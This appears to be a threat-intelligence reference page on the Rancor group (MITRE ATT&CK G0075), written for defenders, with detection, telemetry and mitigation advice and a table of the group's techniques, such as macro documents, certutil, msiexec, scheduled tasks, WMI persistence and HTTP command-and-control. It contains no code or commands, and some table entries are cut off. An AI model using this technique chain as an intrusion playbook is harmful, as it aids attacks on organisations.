G0075: Rancor
Analyst context for executives and security teams
Rancor matters as a targeted-campaign reference point: MITRE describes the group as using politically motivated lures and malicious documents against victims in Southeast Asia. For leaders, the practical lesson is not the name alone, but whether the organization can prevent, detect, and investigate document-driven initial access that leads into Windows command execution, persistence, tool transfer, and web-based command-and-control patterns.
Executive priority
Prioritize Rancor as a validation use case for phishing resilience, endpoint visibility, and incident response readiness where the organization has users, partners, executives, or operations exposed to politically themed targeting in Southeast Asia. The ATT&CK relationships emphasize common enterprise control questions: can the SOC see malicious attachment execution, signed Windows utilities used suspiciously, scheduled tasks, WMI persistence, and outbound web-protocol C2; and can incident responders quickly preserve host and email evidence for audit and containment decisions.
Technical view
The group object has no official detection text and no platform field, but the related techniques and software are heavily Windows-relevant: Reg, certutil, PLAINTEE, Scheduled Task, Windows Command Shell, Visual Basic, Msiexec, and WMI event subscription. Detection engineering should map coverage from spearphishing attachment and malicious file execution through post-execution behaviors: cmd activity, suspicious certutil or msiexec use, registry interaction, scheduled task creation, WMI event subscription artifacts, ingress tool transfer, and outbound HTTP/S-style command-and-control. Treat these as behavior-validation themes rather than indicators of Rancor attribution by themselves.
Likely telemetry
- Email security logs and message metadata for spearphishing attachments and politically themed lures where available
- Endpoint process creation telemetry for cmd.exe, msiexec.exe, certutil.exe, reg.exe, script or Visual Basic execution, and parent-child process context
- Windows scheduled task creation and modification events
- WMI event filter, consumer, and binding telemetry or forensic artifacts
- Registry modification telemetry relevant to persistence or configuration changes
Detection direction
- Validate detections across the full chain: malicious attachment delivery, user-opened file execution, command shell activity, persistence creation, tool transfer, and outbound web traffic.
- Tune signed-utility detections carefully: certutil, reg, and msiexec have legitimate administrative uses, so prioritize suspicious command-line arguments, unusual parent processes, user context, destination patterns, and execution from user-writable paths.
- Confirm that scheduled task and WMI persistence visibility is enabled and retained long enough for incident response timelines.
- Use the Rancor relationships as threat-informed test cases, not as attribution rules; the same techniques and utilities are common across many adversaries and administrators.
- Look for blind spots in email-to-endpoint correlation, especially where attachments are detonated in email tools but endpoint execution telemetry is incomplete.
Mitigation priorities
- Strengthen phishing and attachment controls first: filtering, attachment analysis, user reporting workflows, and rapid mailbox search/removal procedures.
- Harden endpoint execution paths by limiting unnecessary script, macro, installer, and command-line abuse opportunities consistent with business needs.
- Restrict and monitor administrative utilities such as certutil, msiexec, reg, scheduled tasks, and WMI where feasible, focusing on least privilege and high-fidelity logging.
- Ensure EDR and Windows logging cover process creation, command lines, scheduled tasks, WMI subscriptions, registry changes, and file downloads.
- Prepare IR playbooks that connect email evidence, host triage, persistence checks, malware containment, and outbound network review.
Analyst notes and limits
The most decision-useful aspect of this object is the relationship context: a targeted group associated with malicious documents and a set of techniques that span initial access, execution, persistence, stealth, and command-and-control. Rancor-specific confidence should depend on local evidence, such as matching malware, campaign artifacts, or intelligence from the cited reporting, not on generic use of Windows utilities alone.
MITRE provides no official detection section, no explicit tactics or platforms on the group object, and only a brief description. Several related techniques list platforms beyond Windows, but many connected tools and behaviors are Windows-oriented. This take therefore stays at the defensive validation level and does not assert active exploitation, victim exposure, or guaranteed detection coverage.
Rancor
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1071.001 | Web Protocols Sub-technique | Rancor has used HTTP for C2.CitationRancor Unit42 June 2018 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Rancor has used VBS scripts as well as embedded macros for execution.CitationRancor Unit42 June 2018 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Rancor attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.CitationRancor Unit42 June 2018 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Rancor launched a scheduled task to gain persistence using the |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1218.007 | Msiexec Sub-technique | Rancor has used |
| Enterprise | T1546.003 | Windows Management Instrumentation Event Subscription Sub-technique | Rancor has complied VBScript-generated MOF files into WMI event subscriptions for persistence.CitationRancor WMI |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Rancor has used cmd.exe to execute commmands.CitationRancor Unit42 June 2018 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Rancor has attached a malicious document to an email to gain initial access.CitationRancor Unit42 June 2018 |
Groups, software, and campaigns
S0075: Reg
S0255: DDKONG
S0254: PLAINTEE
S0160: certutil
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.3 | Current bundle | c339a4b192ac… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Rancor Unit42 June 2018
Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
Open source URL -
[2]
Rancor
(Citation: Rancor Unit42 June 2018)
-
[3]
mitre-attack G0075Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.